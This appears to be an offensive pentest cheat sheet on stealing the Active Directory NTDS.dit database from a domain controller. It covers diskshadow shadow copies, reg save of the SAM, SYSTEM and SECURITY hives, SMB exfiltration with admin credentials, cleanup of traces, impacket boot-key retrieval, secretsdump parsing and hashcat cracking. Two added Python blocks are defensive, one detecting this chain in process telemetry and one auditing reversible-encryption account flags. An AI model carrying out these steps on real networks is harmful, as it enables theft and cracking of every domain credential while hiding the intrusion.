NTDS

Windows NT Directory Services

Shadow Disk

Create via Diskshadow

Locate diskshadow.exe:

cmd /c where /R C:\ diskshadow.exe

Create a shadow disk:

cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt

Contents of add_vol.txt:

set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup

Exfiltrate over SMB

Stage everything we need in a directory reachable over SMB (the example below uses C:\Windows\Temp, reached through the C$ admin share):

cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive

Connect to the share and grab the files:

$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive

Clean Up

Remove the shadow volume:

cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt

Contents of delete_vol.txt:

set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset

Remove the staged files and the remaining traces:

cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
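
From the defender's side, the shadow-disk procedure above leaves a recognisable trail in process-creation telemetry: diskshadow.exe launched with a /s script file, a copy of ntds.dit out of the freshly exposed volume, and reg.exe save of the SYSTEM, SAM and SECURITY hives. The following is an added example, not part of the original notes: it runs three regex rules over constructed Sysmon-style events (the Image/CommandLine field names are assumed, and the sample command lines are made up to mirror the steps above) and returns a high-confidence verdict only when all three stages are seen together.

```python
import re
from typing import Dict, List

# Constructed sample telemetry in the shape of Sysmon Event ID 1 (process creation)
# records; only the Image and CommandLine fields are used here.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s add_vol.txt"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy w:\Windows\NTDS\ntds.dit ntds.dit"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\system system.hive"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe  save  HKLM\SAM sam.hive"},
    # Interactive diskshadow session (typical of a backup admin): should not fire.
    {"Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe"},
    # Unrelated process touching a same-named file: should not fire.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe add_vol.txt"},
]

# Detection rules, matched against the lower-cased command line.
RULES = {
    # diskshadow driven by a script file (/s) instead of an interactive session
    "diskshadow_scripted": re.compile(r"diskshadow(\.exe)?\s+/s\s+\S+"),
    # any reference to the AD database file, whatever drive letter the shadow is exposed as
    "ntds_dit_access": re.compile(r"[\\/]ntds[\\/]ntds\.dit\b"),
    # export of the hive needed to decrypt the database (SYSTEM) or of local secrets (SAM, SECURITY)
    "hive_export": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b"),
}


def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule whose pattern matches the event's command line."""
    cmd = event.get("CommandLine", "").lower()
    return [name for name, pattern in RULES.items() if pattern.search(cmd)]


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run all rules over a batch of events; keep only the events that matched something."""
    hits = []
    for event in events:
        matched = classify_event(event)
        if matched:
            hits.append({"Image": event["Image"],
                         "CommandLine": event["CommandLine"],
                         "rules": matched})
    return hits


def credential_dump_chain(events: List[Dict[str, str]]) -> bool:
    """High-confidence verdict: all three stages of the procedure observed in one batch
    (one host, one time window), rather than any single rule firing on its own."""
    fired = {rule for event in events for rule in classify_event(event)}
    return {"diskshadow_scripted", "ntds_dit_access", "hive_export"} <= fired


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{', '.join(hit['rules']):<22} {hit['CommandLine']}")
    print("credential dump chain:", credential_dump_chain(SAMPLE_EVENTS))
```

The rules key on what the procedure cannot avoid (a scripted diskshadow run, a path ending in \NTDS\ntds.dit, a hive export with reg save) rather than on the file names chosen in the notes, which can be changed freely. An interactive diskshadow.exe launch by itself does not fire, which keeps noise from legitimate backup administration low; the combined verdict is what should page someone.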

Raw NTDS.dit Copy

Obtain a copy of NTDS.dit:

PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit

Parse on-site in conjunction with NtdsAudit:

PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt

Parse on-site with secretsdump.exe (the boot key is first retrieved from the DC's remote registry with impacket):

from binascii import hexlify
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations

hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'  # fall back to pass-the-hash when no cleartext password is set
domain = hostname.split('.', 1)[1]       # 'megacorp.local'

# Authenticate over SMB and read the boot key (SYSKEY) from the DC's remote registry
smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
remOps.enableRegistry()
bootKey = remOps.getBootKey()
print(hexlify(bootKey).decode())
remOps.finish()

# Feed the printed boot key to secretsdump.exe to decrypt the copied ntds.dit locally:
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>

Parse NTDS.dit

Parse with secretsdump.py:

$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

Parse with aesedb (faster but less informative):

$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress

Parse with ntdissector:

Reversible Encryption

Check if enabled globally:

  • gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled

Check if enabled for specific users:

PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt

When DCSyncing such users, a cleartext password will be obtained.
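
The `-band 128` in the Get-ADUser filter above tests a single bit of userAccountControl (ENCRYPTED_TEXT_PWD_ALLOWED, 0x80). As an added example, not part of the original notes, the Python below decodes the flags that matter for this audit from constructed directory records (the names and values are made up), so that reversible-encryption accounts can be reported together with whether they are still enabled.

```python
from typing import Dict, List

# Well-known userAccountControl bit flags (the subset relevant to a password-hygiene audit).
UAC_FLAGS: Dict[int, str] = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",  # "Store password using reversible encryption"
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
ENCRYPTED_TEXT_PWD_ALLOWED = 0x0080  # the 128 used in the Get-ADUser filter above

# Constructed sample records in the shape Get-ADUser returns; values are made up.
SAMPLE_USERS: List[Dict[str, object]] = [
    {"name": "Alice Admin", "samAccountName": "alice", "userAccountControl": 0x200},
    {"name": "Bob Legacy", "samAccountName": "bob", "userAccountControl": 0x200 | 0x80},
    {"name": "Carol Old", "samAccountName": "carol", "userAccountControl": 0x200 | 0x80 | 0x2},
    {"name": "svc-backup", "samAccountName": "svc-backup",
     "userAccountControl": 0x200 | 0x10000 | 0x80},
]


def decode_uac(value: int) -> List[str]:
    """Expand a userAccountControl integer into the names of the flags that are set."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def reversible_encryption_users(users: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Python counterpart of `Get-ADUser -Filter {userAccountControl -band 128}`: every account
    whose password is stored with reversible encryption, with its enabled state and full flag list."""
    report = []
    for u in users:
        uac = int(u["userAccountControl"])
        if uac & ENCRYPTED_TEXT_PWD_ALLOWED:
            report.append({
                "samAccountName": u["samAccountName"],
                "enabled": not (uac & ACCOUNTDISABLE),
                "flags": decode_uac(uac),
            })
    return report


if __name__ == "__main__":
    for entry in reversible_encryption_users(SAMPLE_USERS):
        state = "enabled" if entry["enabled"] else "disabled"
        print(f"{entry['samAccountName']:<12} {state:<9} {' | '.join(entry['flags'])}")
```

Disabled accounts with the bit set still hold a recoverable cleartext password in the database, so the report keeps them rather than filtering on enabled state; the per-account bit matters even when the Default Domain Policy setting is off, because the GPO setting and the account flag are independent.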
